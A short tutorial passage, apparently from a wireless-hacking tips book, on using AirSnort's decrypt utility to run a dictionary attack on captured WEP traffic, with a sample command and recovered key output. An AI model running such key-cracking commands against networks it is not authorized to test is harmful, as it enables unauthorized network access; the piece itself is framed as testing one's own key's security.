Use a dictionary attack to test the security of your WEP key.

While widely publicized for its ability to crack a WEP key in real time by attacking weaknesses in the implementation, AirSnort requires a potentially large amount of data to be gathered before the attack is successful. AirSnort also comes with a largely unknown utility that will perform a dictionary attack on a relatively tiny sampling of network traffic.

Using the aptly named decrypt utility, you can attempt to decrypt a WEP stream by trying a list of potential candidates from a word list. This attack can be carried out in a matter of minutes, rather than the hours that would be required to collect the large traffic samples needed to interpolate a WEP key.

To use the decrypt utility, you first need a packet dump from a utility that can capture raw 802.11 frames (such as Kismet [Hack #31]). You will also need a list of suitable candidates, namely words that are either 5 or 13 characters long (for 40-bit or 104-bit WEP respectively). Invoke the utility like this:

# decrypt -f /usr/dict/words -m 00:02:2D:27:D9:22 -e encrypted.dump -d 
            [RETURN]
            
out.dump
Found key: Hex - 61:6c:6f:68:61, ASCII - "aloha"

Notice that you also need to specify the BSSID of the network you wish to attempt to decrypt. In this case, the BSSID is the same as the MAC address of the AP, but can be set to virtually anything. You can obtain this field from the Info pane inside Kismet when capturing the data